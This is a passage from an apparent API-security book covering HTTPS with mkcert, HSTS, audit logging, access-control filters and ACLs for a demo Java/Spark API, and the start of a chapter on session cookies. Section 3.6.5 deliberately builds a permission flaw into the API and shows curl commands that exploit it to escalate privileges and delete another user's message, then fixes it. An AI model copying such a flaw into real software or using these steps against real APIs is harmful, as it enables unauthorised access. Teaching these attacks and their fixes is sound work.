A self-signed certificate is a certificate that has been signed using the private key associated with that same certificate, rather than by a trusted certificate authority. Self-signed certificates should be used only when you have a direct trust relationship with the certificate owner, such as when you generated the certificate yourself.
You can now generate a certificate for your Spark server running on localhost. By
default, mkcert generates certificates in Privacy Enhanced Mail (PEM) format. For
Java, you need the certificate in PKCS#12 format, so run the following command in
the root folder of the Natter project to generate a certificate for localhost:
mkcert -pkcs12 localhost
The certificate and private key will be generated in a file called localhost.p12. By
default, the password for this file is changeit. You can now enable HTTPS support in
Spark by adding a call to the secure() static method, as shown in listing 3.4. The first
two arguments to the method give the name of the keystore file containing the server
certificate and private key. Leave the remaining arguments as null; these are only
needed if you want to support client certificate authentication (which is covered in
chapter 11).
WARNING
The CA certificate and private key that mkcert generates can be
used to generate certificates for any website that will be trusted by your browser.
Do not share these files or send them to anybody. When you have finished
development, consider running mkcert -uninstall to remove the CA from
your system trust stores.
Listing 3.4 Enabling HTTPS
// Import the secure method.
import static spark.Spark.secure;
public class Main {
    public static void main(String... args) throws Exception {
        // Enable HTTPS support at the start of the main method.
        secure("localhost.p12", "changeit", null, null);
        ..
    }
}
Restart the server for the changes to take effect. If you started the server from the
command line, then you can use Ctrl-C to interrupt the process and then simply run it
again. If you started the server from your IDE, then there should be a button to restart
the process.
Finally, you can call your API (after restarting the server). If curl refuses to connect, you can use the --cacert option to curl to tell it to trust the mkcert certificate:
$ curl --cacert "$(mkcert -CAROOT)/rootCA.pem"
➥ -d ‘{"username":"demo","password":"password"}’
➥ -H ‘Content-Type: application/json’ https://localhost:4567/users
{"username":"demo"}
WARNING
Don’t be tempted to disable TLS certificate validation by passing
the -k or --insecure options to curl (or similar options in an HTTPS
library). Although this may be OK in a development environment, disabling
certificate validation in a production environment undermines the security
guarantees of TLS. Get into the habit of generating and using correct certifi-
cates. It’s not much harder, and you’re less likely to make mistakes later.
3.4.2 Strict transport security
When a user visits a website in a browser, the browser will first attempt to connect to the non-secure HTTP version of a page, as many websites still do not support HTTPS. A secure site will redirect the browser to the HTTPS version of the page. For an API, you should only expose the API over HTTPS, because users will not be directly connecting to the API endpoints using a web browser and so you do not need to support this legacy behavior. API clients also often send sensitive data such as passwords on the first request, so it is better to completely reject non-HTTPS requests. If for some reason you do need to support web browsers directly connecting to your API endpoints, then best practice is to immediately redirect them to the HTTPS version of the API and to set the HTTP Strict-Transport-Security (HSTS) header to instruct the browser to always use the HTTPS version in future. If you add the following line to the afterAfter filter in your main method, it will add an HSTS header to all responses:
response.header("Strict-Transport-Security", "max-age=31536000");
TIP
Adding an HSTS header for localhost is not a good idea as it will prevent you from running development servers over plain HTTP until the max-age attribute expires. If you want to try it out, set a short max-age value.
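As a hedged sketch of that wiring (the lambda form is illustrative; spark.Spark.afterAfter is the same filter hook used for audit logging later in this chapter), the header could be registered like this:
afterAfter((request, response) -> {
    // Instruct browsers to use HTTPS for the next year
    // (max-age is in seconds). Avoid doing this for localhost.
    response.header("Strict-Transport-Security", "max-age=31536000");
});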
3.5 Audit logging for accountability
Accountability relies on being able to determine who did what and when. The simplest way to do this is to keep a log of actions that people perform using your API, known as an audit log. Figure 3.6 repeats the mental model that you should have for the mechanisms discussed in this chapter. Audit logging should occur after authentication, so that you know who is performing an action, but before you make authorization decisions that may deny access. The reason for this is that you want to record all attempted operations, not just the successful ones. Unsuccessful attempts to perform actions may be indications of an attempted attack. It’s difficult to overstate the importance of good audit logging to the security of an API. Audit logs should be written to durable storage, such as the file system or a database, so that the audit logs will survive if the process crashes for any reason.
Pop quiz
5 Recalling the CIA triad from chapter 1, which one of the following security goals is not provided by TLS?
a Confidentiality
b Integrity
c Availability
The answer is at the end of the chapter.
Thankfully, given the importance of audit logging, it’s easy to add some basic logging capability to your API. In this case, you’ll log into a database table so that you can easily view and search the logs from the API itself.
TIP
In a production environment you typically will want to send audit logs
to a centralized log collection and analysis tool, known as a SIEM (Security
Information and Event Management) system, so they can be correlated with
logs from other systems and analyzed for potential threats and unusual
behavior.
As for previous new functionality, you’ll add a new database table to store the audit
logs. Each entry will have an identifier (used to correlate the request and response
logs), along with some details of the request and the response. Add the following table
definition to schema.sql.
NOTE
The audit table should not have any reference constraints to any other
tables. Audit logs should be recorded based on the request, even if the details
are inconsistent with other data.
CREATE TABLE audit_log(
audit_id INT NULL,
method VARCHAR(10) NOT NULL,
path VARCHAR(100) NOT NULL,
user_id VARCHAR(30) NULL,
status INT NULL,
audit_time TIMESTAMP NOT NULL
);
CREATE SEQUENCE audit_id_seq;
Figure 3.6 Audit logging should occur both before a request is processed and after it completes. When implemented as a filter, it should be placed after authentication, so that you know who is performing each action, but before access control checks so that you record operations that were attempted but denied. Responses should be logged as well as requests, especially if access is denied, and audit logs should be written to durable storage.
As before, you also need to grant appropriate permissions to the natter_api_user, so
in the same file add the following line to the bottom of the file and save:
GRANT SELECT, INSERT ON audit_log TO natter_api_user;
A new controller can now be added to handle the audit logging. You split the logging into two filters, one that occurs before the request is processed (after authentication), and one that occurs after the response has been produced. You’ll also allow access to the logs to anyone for illustration purposes. You should normally lock down audit logs to only a small number of trusted users, as they are often sensitive in themselves. Often the users that can access audit logs (auditors) are different from the normal system administrators, as administrator accounts are the most privileged and so most in need of monitoring. This is an important security principle known as separation of duties.
DEFINITION
The principle of separation of duties requires that different aspects of privileged actions should be controlled by different people, so that no one person is solely responsible for the action. For example, a system administrator should not also be responsible for managing the audit logs for that system. In financial systems, separation of duties is often used to ensure that the person who requests a payment is not also the same person who approves the payment, providing a check against fraud.
In your editor, navigate to src/main/java/com/manning/apisecurityinaction/controller and create a new file called AuditController.java. Listing 3.5 shows the content of this new controller that you should copy into the file and save. As mentioned, the logging is split into two filters: one of which runs before each operation, and one which runs afterward. This ensures that if the process crashes while processing a request you can still see what requests were being processed at the time. If you only logged responses, then you’d lose any trace of a request if the process crashes, which would be a problem if an attacker found a request that caused the crash. To allow somebody reviewing the logs to correlate requests with responses, generate a unique audit log ID in the auditRequestStart method and add it as an attribute to the request. In the auditRequestEnd method, you can then retrieve the same audit log ID so that the two log events can be tied together.
Listing 3.5 The audit log controller
package com.manning.apisecurityinaction.controller;
import org.dalesbred.*;
import org.json.*;
import spark.*;
import java.sql.*;
import java.time.*;
import java.time.temporal.*;
public class AuditController {
    private final Database database;
    public AuditController(Database database) {
        this.database = database;
    }
    public void auditRequestStart(Request request, Response response) {
        database.withVoidTransaction(tx -> {
            // Generate a new audit id before the request is processed
            // and save it as an attribute on the request.
            var auditId = database.findUniqueLong(
                "SELECT NEXT VALUE FOR audit_id_seq");
            request.attribute("audit_id", auditId);
            database.updateUnique(
                "INSERT INTO audit_log(audit_id, method, path, " +
                    "user_id, audit_time) " +
                "VALUES(?, ?, ?, ?, current_timestamp)",
                auditId,
                request.requestMethod(),
                request.pathInfo(),
                request.attribute("subject"));
        });
    }
    public void auditRequestEnd(Request request, Response response) {
        // When processing the response, look up the audit id
        // from the request attributes.
        database.updateUnique(
            "INSERT INTO audit_log(audit_id, method, path, status, " +
                "user_id, audit_time) " +
            "VALUES(?, ?, ?, ?, ?, current_timestamp)",
            request.attribute("audit_id"),
            request.requestMethod(),
            request.pathInfo(),
            response.status(),
            request.attribute("subject"));
    }
}
Listing 3.6 shows the code for reading entries from the audit log for the last hour. The entries are queried from the database and converted into JSON objects using a custom RowMapper method. The list of records is then returned as a JSON array. A simple limit is added to the query to prevent too many results from being returned.
Listing 3.6 Reading audit log entries
public JSONArray readAuditLog(Request request, Response response) {
    // Read log entries for the last hour.
    var since = Instant.now().minus(1, ChronoUnit.HOURS);
    var logs = database.findAll(AuditController::recordToJson,
        "SELECT * FROM audit_log " +
        "WHERE audit_time >= ? LIMIT 20", since);
    // Convert each entry into a JSON object (using the recordToJson
    // helper below) and collect the results as a JSON array.
    return new JSONArray(logs);
}
private static JSONObject recordToJson(ResultSet row)
        throws SQLException {
    return new JSONObject()
        .put("id", row.getLong("audit_id"))
        .put("method", row.getString("method"))
        .put("path", row.getString("path"))
        .put("status", row.getInt("status"))
        .put("user", row.getString("user_id"))
        .put("time", row.getTimestamp("audit_time").toInstant());
}
You can then wire this new controller into your main method, taking care to insert the filter between your authentication filter and the access control filters for individual operations. Because Spark filters must either run before or after (and not around) an API call, you define separate filters to run before and after each request.
Open the Main.java file in your editor and locate the lines that install the filters for authentication. Audit logging should come straight after authentication, so you should add the audit filters in between the authentication filter and the first route definition, as in this next snippet. Add the indicated lines and then save the file.
before(userController::authenticate);
// Add these lines to create and register the audit controller.
var auditController = new AuditController(database);
before(auditController::auditRequestStart);
afterAfter(auditController::auditRequestEnd);
post("/spaces",
    spaceController::createSpace);
Finally, you can register a new (unsecured) endpoint for reading the logs. Again, in a
production environment this should be disabled or locked down:
get("/logs", auditController::readAuditLog);
Once installed and the server has been restarted, make some sample requests, and
then view the audit log. You can use the jq utility (https://stedolan.github.io/jq/) to
pretty-print the output:
$ curl --cacert "$(mkcert -CAROOT)/rootCA.pem" https://localhost:4567/logs | jq
[
{
"path": "/users",
"method": "POST",
"id": 1,
"time": "2019-02-06T17:22:44.123Z"
},
{
"path": "/users",
"method": "POST",
"id": 1,
"time": "2019-02-06T17:22:44.237Z",
"status": 201
},
{
"path": "/spaces/1/messages/1",
"method": "DELETE",
"id": 2,
"time": "2019-02-06T17:22:55.266Z",
"user": "demo"
},...
]
This style of log is a basic access log, which logs the raw HTTP requests and responses to your API. Another way to create an audit log is to capture events in the business logic layer of your application, such as User Created or Message Posted events. These events describe the essential details of what happened without reference to the specific protocol used to access the API. Yet another approach is to capture audit events directly in the database using triggers to detect when data is changed. The advantage of these alternative approaches is that they ensure that events are logged no matter how the API is accessed, for example, if the same API is available over HTTP or using a binary RPC protocol. The disadvantage is that some details are lost, and some potential attacks may be missed due to this missing detail.
3.6 Access control
You now have a reasonably secure password-based authentication mechanism in place,
along with HTTPS to secure data and passwords in transmission between the API cli-
ent and server. However, you’re still letting any user perform any action. Any user can
post a message to any social space and read all the messages in that space. Any user
can also decide to be a moderator and delete messages from other users. To fix this,
you’ll now implement basic access control checks.
Pop quiz
6 Which secure design principle would indicate that audit logs should be managed by different users than the normal system administrators?
a The Peter principle
b The principle of least privilege
c The principle of defense in depth
d The principle of separation of duties
e The principle of security through obscurity
The answer is at the end of the chapter.
Access control should happen after authentication, so that you know who is trying to perform the action, as shown in figure 3.7. If the request is granted, then it can proceed through to the application logic. However, if it is denied by the access control rules, then it should be failed immediately, and an error response returned to the user. The two main HTTP status codes for indicating that access has been denied are 401 Unauthorized and 403 Forbidden. See the sidebar for details on what these two codes mean and when to use one or the other.
HTTP 401 and 403 status codes
HTTP includes two standard status codes for indicating that the client failed security checks, and it can be confusing to know which status to use in which situations.
The 401 Unauthorized status code, despite the name, indicates that the server required authentication for this request but the client either failed to provide any credentials, or they were incorrect, or they were of the wrong type. The server doesn’t know if the user is authorized or not because it doesn’t know who they are. The client (or user) may be able to fix the situation by trying different credentials. A standard WWW-Authenticate header can be returned to tell the client what credentials it needs, which it will then return in the Authorization header. Confused yet? Unfortunately, the HTTP specifications use the words authorization and authentication as if they were identical.
The 403 Forbidden status code, on the other hand, tells the client that its credentials were fine for authentication, but that it’s not allowed to perform the operation it requested. This is a failure of authorization, not authentication. The client cannot typically do anything about this other than ask the administrator for access.
Figure 3.7 Access control occurs after authentication and the request has been logged for audit. If access is denied, then a 403 Forbidden response is immediately returned without running any of the application logic, and forbidden requests are still logged. If access is granted, then the request proceeds as normal to the main API logic.
3.6.1 Enforcing authentication
The most basic access control check is simply to require that all users are authenticated. This ensures that only genuine users of the API can gain access, while not enforcing any further requirements. You can enforce this with a simple filter that runs after authentication and verifies that a genuine subject has been recorded in the request attributes. If no subject attribute is found, then it rejects the request with a 401 status code and adds a standard WWW-Authenticate header to inform the client that the user should authenticate with Basic authentication. Open the UserController.java file in your editor, and add the following method, which can be used as a Spark before filter to enforce that users are authenticated:
public void requireAuthentication(Request request,
        Response response) {
    if (request.attribute("subject") == null) {
        response.header("WWW-Authenticate",
            "Basic realm=\"/\", charset=\"UTF-8\"");
        halt(401);
    }
}
You can then open the Main.java file and require that all calls to the Spaces API are
authenticated, by adding the following filter definition. As shown in figure 3.7 and
throughout this chapter, access control checks like this should be added after authen-
tication and audit logging. Locate the line where you added the authentication filter
earlier and add a filter to enforce authentication on all requests to the API that start
with the /spaces URL path, so that the code looks like the following:
// First, try to authenticate the user.
before(userController::authenticate);
// Then perform audit logging.
before(auditController::auditRequestStart);
afterAfter(auditController::auditRequestEnd);
// Finally, add the check if authentication was successful.
before("/spaces", userController::requireAuthentication);
post("/spaces", spaceController::createSpace);
..
If you save the file and restart the server, you can now see unauthenticated requests to create a space be rejected with a 401 error asking for authentication, as in the following example:
$ curl -i -d ‘{"name":"test space","owner":"demo"}’
➥ -H ‘Content-Type: application/json’ https://localhost:4567/spaces
HTTP/1.1 401 Unauthorized
Date: Mon, 18 Mar 2019 14:51:40 GMT
WWW-Authenticate: Basic realm="/", charset="UTF-8"
...
Retrying the request with authentication credentials allows it to succeed:
$ curl -i -d ‘{"name":"test space","owner":"demo"}’
➥ -H ‘Content-Type: application/json’ -u demo:changeit
➥ https://localhost:4567/spaces
HTTP/1.1 201 Created
...
{"name":"test space","uri":"/spaces/1"}
3.6.2 Access control lists
Beyond simply requiring that users are authenticated, you may also want to impose additional restrictions on who can perform certain operations. In this section, you’ll implement a very simple access control method based upon whether a user is a member of the social space they are trying to access. You’ll accomplish this by keeping track of which users are members of which social spaces in a structure known as an access control list (ACL).
Each entry for a space will list a user that may access that space, along with a set of permissions that define what they can do. The Natter API has three permissions: read messages in a space, post messages to that space, and a delete permission granted to moderators.
DEFINITION
An access control list is a list of users that can access a given object,
together with a set of permissions that define what each user can do.
Why not simply let all authenticated users perform any operation? In some APIs this may be an appropriate security model, but for most APIs some operations are more sensitive than others. For example, you might let anyone in your company see their own salary information in your payroll API, but the ability to change somebody’s salary is not normally something you would allow any employee to do! Recall the principle of least authority (POLA) from chapter 1, which says that any user (or process) should be given exactly the right amount of authority to do the jobs they need to do. Too many permissions and they may cause damage to the system. Too few permissions and they may try to work around the security of the system to get their job done.
Permissions will be granted to users in a new permissions table, which links a user to a set of permissions in a given social space. For simplicity, you’ll represent permissions as a string of the characters r (read), w (write), and d (delete). Add the following table definition to the bottom of schema.sql in your text editor and save the new definition. It must come after the spaces and users table definitions because it references them, ensuring that permissions can only be granted for spaces and users that actually exist.
CREATE TABLE permissions(
space_id INT NOT NULL REFERENCES spaces(space_id),
user_id VARCHAR(30) NOT NULL REFERENCES users(user_id),
perms VARCHAR(3) NOT NULL,
PRIMARY KEY (space_id, user_id)
);
GRANT SELECT, INSERT ON permissions TO natter_api_user;
You then need to make sure that the initial owner of a space is given all permissions. You can update the createSpace method to grant all permissions to the owner in the same transaction that creates the space. Open SpaceController.java in your text editor and locate the createSpace method. Add the lines indicated in the following listing:
return database.withTransaction(tx -> {
    var spaceId = database.findUniqueLong(
        "SELECT NEXT VALUE FOR space_id_seq;");
    database.updateUnique(
        "INSERT INTO spaces(space_id, name, owner) " +
        "VALUES(?, ?, ?);", spaceId, spaceName, owner);
    // Ensure the space owner has all permissions
    // on the newly created space.
    database.updateUnique(
        "INSERT INTO permissions(space_id, user_id, perms) " +
        "VALUES(?, ?, ?)", spaceId, owner, "rwd");
    response.status(201);
    response.header("Location", "/spaces/" + spaceId);
    return new JSONObject()
        .put("name", spaceName)
        .put("uri", "/spaces/" + spaceId);
});
You now need to add checks to enforce that the user has appropriate permissions for the actions that they are trying to perform. You could hard-code these checks into each individual method, but it’s much more maintainable to enforce access control decisions using filters that run before the controller is even called. This separation of concerns ensures that the controller can concentrate on the core logic of the operation, without having to worry about access control details. This also ensures that if you ever want to change how access control is performed, you can do this in the common filter rather than changing every single controller method.
NOTE
Access control checks are often included directly in business logic, because who has access to what is ultimately a business decision. This also ensures that access control rules are consistently applied no matter how that functionality is accessed. On the other hand, separating out the access control checks makes it easier to centralize policy management, as you’ll see in chapter 8.
To enforce your access control rules, you need a filter that can determine whether the
authenticated user has the appropriate permissions to perform a given operation on a
given space. Rather than have one filter that tries to determine what operation is
being performed by examining the request, you’ll instead write a factory method that
returns a new filter given details about the operation. You can then use this to create
specific filters for each operation. Listing 3.7 shows how to implement this filter in
your UserController class.
Open UserController.java and add the method in listing 3.7 to the class underneath the other existing methods. The method takes as input the name of the HTTP method being performed and the permission required. If the HTTP method does not match, then you skip validation for this operation, and let other filters handle it. Before you can enforce any access control rules, you must first ensure that the user is authenticated, so add a call to the existing requireAuthentication filter. Then you can look up the authenticated user in the user database and determine if they have the required permissions to perform this action, in this case by simple string matching against the permission letters. For more complex cases, you might want to convert the permissions into a Set object and explicitly check that all required permissions are contained in the set of permissions of the user.
TIP
The Java EnumSet class can be used to efficiently represent a set of permissions as a bit vector, providing a compact and fast way to quickly check if a user has a set of required permissions.
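For illustration only, a sketch of that idea follows; the Permission enum and the hasAll helper are hypothetical names invented for this example, not part of the Natter code:
import java.util.EnumSet;
enum Permission { READ, WRITE, DELETE }
class PermissionCheck {
    static boolean hasAll(EnumSet<Permission> granted,
                          EnumSet<Permission> required) {
        // EnumSet stores its members as a bit vector, so containsAll
        // amounts to a fast bitwise test of the required bits.
        return granted.containsAll(required);
    }
}
With this, hasAll(EnumSet.of(Permission.READ, Permission.WRITE), EnumSet.of(Permission.READ)) evaluates to true, while a request needing DELETE against the same granted set would fail.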
If the user does not have the required permissions, then you should fail the request with a 403 Forbidden status code. This tells the user that they are not allowed to perform the operation that they are requesting.
Listing 3.7 Checking permissions in a filter
public Filter requirePermission(String method, String permission) {
    // Return a new Spark filter as a lambda expression.
    return (request, response) -> {
        // Ignore requests that don't match the request method.
        if (!method.equalsIgnoreCase(request.requestMethod())) {
            return;
        }
        // First check if the user is authenticated.
        requireAuthentication(request, response);
        var spaceId = Long.parseLong(request.params(":spaceId"));
        var username = (String) request.attribute("subject");
        // Look up permissions for the current user in the given
        // space, defaulting to no permissions.
        var perms = database.findOptional(String.class,
            "SELECT perms FROM permissions " +
            "WHERE space_id = ? AND user_id = ?",
            spaceId, username).orElse("");
        // If the user doesn't have permission, then halt with
        // a 403 Forbidden status.
        if (!perms.contains(permission)) {
            halt(403);
        }
    };
}
3.6.3 Enforcing access control in Natter
You can now add filters to each operation in your main method, as shown in listing 3.8.
Before each Spark route you add a new before() filter that enforces correct permis-
sions. Each filter path has to have a :spaceId path parameter so that the filter can
determine which space is being operated on. Open the Main.java class in your editor and ensure that your main() method matches the contents of listing 3.8. The new filters enforcing permission checks are the before() lines with requirePermission calls.
NOTE
The implementations of all API operations can be found in the GitHub repository accompanying the book at https://github.com/NeilMadden/apisecurityinaction.
Listing 3.8 Adding authorization filters
public static void main(String... args) throws Exception {
    …
    // Before anything else, you should try to authenticate the user.
    before(userController::authenticate);
    before(auditController::auditRequestStart);
    afterAfter(auditController::auditRequestEnd);
    // Anybody may create a space, so you just enforce
    // that the user is logged in.
    before("/spaces",
        userController::requireAuthentication);
    post("/spaces",
        spaceController::createSpace);
    // For each operation, you add a before() filter that
    // ensures the user has correct permissions.
    before("/spaces/:spaceId/messages",
        userController.requirePermission("POST", "w"));
    post("/spaces/:spaceId/messages",
        spaceController::postMessage);
    before("/spaces/:spaceId/messages/*",
        userController.requirePermission("GET", "r"));
    get("/spaces/:spaceId/messages/:msgId",
        spaceController::readMessage);
    before("/spaces/:spaceId/messages",
        userController.requirePermission("GET", "r"));
    get("/spaces/:spaceId/messages",
        spaceController::findMessages);
    var moderatorController =
        new ModeratorController(database);
    before("/spaces/:spaceId/messages/*",
        userController.requirePermission("DELETE", "d"));
    delete("/spaces/:spaceId/messages/:msgId",
        moderatorController::deletePost);
    // Anybody can register an account, and they won't
    // be authenticated first.
    post("/users", userController::registerUser);
    …
}
With this in place, if you create a second user “demo2” and try to read a message created by the existing demo user in their space, then you get a 403 Forbidden response:
$ curl -i -u demo2:password
➥ https://localhost:4567/spaces/1/messages/1
HTTP/1.1 403 Forbidden
...
3.6.4 Adding new members to a Natter space
So far, there is no way for any user other than the space owner to post or read messages from a space. It’s going to be a pretty antisocial social network unless you can add other users! You can add a new operation that allows another user to be added to a space by any existing user that has read permission on that space. The next listing adds an operation to the SpaceController to allow this.
Open SpaceController.java in your editor and add the addMember method from listing 3.9 to the class. First, validate that the permissions given match the rwd form that you’ve been using. You can do this using a regular expression. If so, then insert the permissions for that user into the permissions ACL table in the database.
Listing 3.9 Adding users to a space
public JSONObject addMember(Request request, Response response) {
    var json = new JSONObject(request.body());
    var spaceId = Long.parseLong(request.params(":spaceId"));
    var userToAdd = json.getString("username");
    var perms = json.getString("permissions");
    // Ensure the permissions granted are valid.
    if (!perms.matches("r?w?d?")) {
        throw new IllegalArgumentException("invalid permissions");
    }
    // Update the permissions for the user in the access control list.
    database.updateUnique(
        "INSERT INTO permissions(space_id, user_id, perms) " +
        "VALUES(?, ?, ?);", spaceId, userToAdd, perms);
    response.status(200);
    return new JSONObject()
        .put("username", userToAdd)
        .put("permissions", perms);
}
You can then add a new route to your main method to allow adding a new member by
POSTing to /spaces/:spaceId/members. Open Main.java in your editor again and
add the following new route and access control filter to the main method underneath
the existing routes:
before("/spaces/:spaceId/members",
userController.requirePermission("POST", "r"));
post("/spaces/:spaceId/members", spaceController::addMember);
You can test this by adding the demo2 user to the space and letting them read messages:
$ curl -u demo:password
➥ -H 'Content-Type: application/json'
➥ -d '{"username":"demo2","permissions":"r"}'
➥ https://localhost:4567/spaces/1/members
{"permissions":"r","username":"demo2"}
$ curl -u demo2:password
➥ https://localhost:4567/spaces/1/messages/1
{"author":"demo","time":"2019-02-06T15:15:03.138Z","message":"Hello,
World!","uri":"/spaces/1/messages/1"}
3.6.5 Avoiding privilege escalation attacks
It turns out that the demo2 user you just added can do a bit more than just read messages. The permissions on the addMember method allow any user with read access to add new users to the space, and they can choose the permissions for the new user. So demo2 can simply create a new account for themselves and grant it more permissions than you originally gave them, as shown in the following example.
First, they create the new user:
$ curl -H 'Content-Type: application/json'
➥ -d '{"username":"evildemo2","password":"password"}'
➥ https://localhost:4567/users
{"username":"evildemo2"}
They then add that user to the space with full permissions:
$ curl -u demo2:password
➥ -H 'Content-Type: application/json'
➥ -d '{"username":"evildemo2","permissions":"rwd"}'
➥ https://localhost:4567/spaces/1/members
{"permissions":"rwd","username":"evildemo2"}
They can now do whatever they like, including deleting your messages:
$ curl -i -X DELETE -u evildemo2:password
➥ https://localhost:4567/spaces/1/messages/1
HTTP/1.1 200 OK
...
What happened here is that although the demo2 user was only granted read permission on the space, they could then use that read permission to add a new user that has full permissions on the space. This is known as a privilege escalation, where a user with lower privileges can exploit a bug to give themselves higher privileges.
DEFINITION
A privilege escalation (or elevation of privilege) occurs when a user
with limited permissions can exploit a bug in the system to grant themselves
or somebody else more permissions than they have been granted.
You can fix this in two general ways:
1 You can require that the permissions granted to the new user are no more than the permissions that are granted to the existing user. That is, you should ensure that evildemo2 is only granted the same access as the demo2 user. (A sketch of this approach appears at the end of this section.)
2 You can require that only users with all permissions can add other users.
For simplicity you’ll implement the second option and change the authorization filter
on the addMember operation to require all permissions. Effectively, this means that
only the owner or other moderators can add new members to a social space.
Open the Main.java file and locate the before filter that grants access to add users
to a social space. Change the permissions required from r to rwd as follows:
before("/spaces/:spaceId/members",
userController.requirePermission("POST", "rwd"));
If you retry the attack with demo2 again you’ll find that they are no longer able to create any users, let alone one with elevated privileges.
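For comparison, the first option could be sketched as an extra check in the addMember method before the INSERT. This is a hedged sketch rather than the book’s implementation; it reuses the existing permissions table and the subject request attribute:
var subject = (String) request.attribute("subject");
var granterPerms = database.findOptional(String.class,
    "SELECT perms FROM permissions " +
    "WHERE space_id = ? AND user_id = ?",
    spaceId, subject).orElse("");
// Reject any permission letter the granting user does not hold themselves.
for (char p : perms.toCharArray()) {
    if (granterPerms.indexOf(p) == -1) {
        throw new IllegalArgumentException(
            "can't grant permissions you don't have");
    }
}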
Pop quiz
7 Which HTTP status code indicates that the user doesn’t have permission to access a resource (rather than not being authenticated)?
a 403 Forbidden
b 404 Not Found
c 401 Unauthorized
d 418 I’m a Teapot
e 405 Method Not Allowed
The answer is at the end of the chapter.
Answers to pop quiz questions
1 c. Rate-limiting should be enforced as early as possible to minimize the resources used in processing requests.
2 b. The Retry-After header tells the client how long to wait before retrying requests.
3 d, e, and f. A secure password hashing algorithm should use a lot of CPU and memory to make it harder for an attacker to carry out brute-force and dictionary attacks. It should use a random salt for each password to prevent an attacker pre-computing tables of common password hashes.
4 e. HTTP Basic credentials are only Base64-encoded, which as you’ll recall from section 3.3.1, are easy to decode to reveal the password.
5 c. TLS provides no availability protections on its own.
6 d. The principle of separation of duties.
7 a. 403 Forbidden. As you’ll recall from the start of section 3.6, despite the name, 401 Unauthorized means only that the user is not authenticated.
Summary
- Use threat-modelling with STRIDE to identify threats to your API. Select appropriate security controls for each type of threat.
- Apply rate-limiting to mitigate DoS attacks. Rate limits are best enforced in a load balancer or reverse proxy but can also be applied per-server for defense in depth.
- Enable HTTPS for all API communications to ensure confidentiality and integrity of requests and responses. Add HSTS headers to tell web browser clients to always use HTTPS.
- Use authentication to identify users and prevent spoofing attacks. Use a secure password-hashing scheme like Scrypt to store user passwords.
- All significant operations on the system should be recorded in an audit log, including details of who performed the action, when, and whether it was successful.
- Enforce access control after authentication. ACLs are a simple approach to enforcing permissions.
- Avoid privilege escalation attacks by considering carefully which users can grant permissions to other users.
Part 2 Token-based authentication
Token-based authentication is the dominant approach to securing APIs, with a wide variety of techniques and approaches. Each approach has different trade-offs and is suitable in different scenarios. In this part of the book, you’ll examine the most commonly used approaches.
Chapter 4 covers traditional session cookies for first-party browser-based apps
and shows how to adapt traditional web application security techniques for use
in APIs.
Chapter 5 looks at token-based authentication without cookies using the
standard Bearer authentication scheme. The focus in this chapter is on building
APIs that can be accessed from other sites and from mobile or desktop apps.
Chapter 6 discusses self-contained token formats such as JSON Web Tokens.
You’ll see how to protect tokens from tampering using message authentication
codes and encryption, and how to handle logout.
Session cookie authentication
So far, you have required API clients to submit a username and password on every
API request to enforce authentication. Although simple, this approach has several
downsides from both a security and usability point of view. In this chapter, you’ll
learn about those downsides and implement an alternative known as token-based
authentication, where the username and password are supplied once to a dedicated
login endpoint. A time-limited token is then issued to the client that can be used in
place of the user’s credentials for subsequent API calls. You will extend the Natter
API with a login endpoint and simple session cookies and learn how to protect
those against Cross-Site Request Forgery (CSRF) and other attacks. The focus of
this chapter is authentication of browser-based clients hosted on the same site as
the API. Chapter 5 covers techniques for clients on other domains and non-
browser clients such as mobile apps.
This chapter covers
- Building a simple web-based client and UI
- Implementing token-based authentication
- Using session cookies in an API
- Preventing cross-site request forgery attacks
DEFINITION
In token-based authentication, a user’s real credentials are pre-
sented once, and the client is then given a short-lived token. A token is typically
a short, random string that can be used to authenticate API calls until the
token expires.
4.1 Authentication in web browsers
In chapter 3, you learned about HTTP Basic authentication, in which the username and password are encoded and sent in an HTTP Authorization header. An API on its own is not very user friendly, so you’ll usually implement a user interface (UI) on top. Imagine that you are creating a UI for Natter that will use the API under the hood but create a compelling web-based user experience on top. In a web browser, you’d use web technologies such as HTML, CSS, and JavaScript. This isn’t a book about UI design, so you’re not going to spend a lot of time creating a fancy UI, but an API that must serve web browser clients cannot ignore UI issues entirely. In this first section, you’ll create a very simple UI to talk to the Natter API to see how the browser interacts with HTTP Basic authentication and some of the drawbacks of that approach. You’ll then develop a more web-friendly alternative authentication mechanism later in the chapter. Figure 4.1 shows the rendered HTML page in a browser. It’s not going to win any awards for style, but it gets the job done. For a more in-depth treatment of the nuts and bolts of building UIs in JavaScript, there are many good books available, such as Michael S. Mikowski and Josh C. Powell’s excellent Single Page Web Applications (Manning, 2014).
4.1.1 Calling the Natter API from JavaScript
Because your API requires JSON requests, which aren’t supported by standard HTML form controls, you need to make calls to the API with JavaScript code, using either the older XMLHttpRequest object or the newer Fetch API in the browser. You’ll use the Fetch interface in this example because it is much simpler and already widely supported by browsers. Listing 4.1 shows a simple JavaScript client for calling the Natter API createSpace operation from within a browser. The createSpace function takes the name of the space and the owner as arguments and calls the Natter REST API using the browser Fetch API. The name and owner are combined into a JSON body, and you should specify the correct Content-Type header so that the Natter API doesn’t
Figure 4.1 A simple web UI for creating a social space with the Natter API
reject the request. The fetch call sets the credentials attribute to include, to ensure that HTTP Basic credentials are set on the request; otherwise, they would not be, and the request would fail to authenticate.
To access the API, create a new folder named public in the Natter project, underneath the src/main/resources folder. Inside that new folder, create a new file called natter.js in your text editor and enter the code from listing 4.1 and save the file. The new file should appear in the project under src/main/resources/public/natter.js.
Listing 4.1 Calling the Natter API from JavaScript
const apiUrl = 'https://localhost:4567';
function createSpace(name, owner) {
    let data = {name: name, owner: owner};
    // Use the Fetch API to call the Natter API endpoint, passing
    // the request data as JSON with the correct Content-Type.
    fetch(apiUrl + '/spaces', {
        method: 'POST',
        credentials: 'include',
        body: JSON.stringify(data),
        headers: {
            'Content-Type': 'application/json'
        }
    })
    // Parse the response JSON or throw an error if unsuccessful.
    .then(response => {
        if (response.ok) {
            return response.json();
        } else {
            throw Error(response.statusText);
        }
    })
    .then(json => console.log('Created space: ', json.name, json.uri))
    .catch(error => console.error('Error: ', error));
}
The Fetch API is designed to be asynchronous, so rather than returning the result of the REST call directly it instead returns a Promise object, which can be used to register functions to be called when the operation completes. You don’t need to worry about the details of that for this example, but just be aware that everything within the .then(response => . . . ) section is executed if the request completed successfully, whereas everything in the .catch(error => . . . ) section is executed if a network error occurs. If the request succeeds, then parse the response as JSON and log the details to the JavaScript console. Otherwise, any error is also logged to the console. The response.ok field indicates whether the HTTP status code was in the range 200–299, because these indicate successful responses in HTTP.
Create a new file called natter.html under src/main/resources/public, alongside
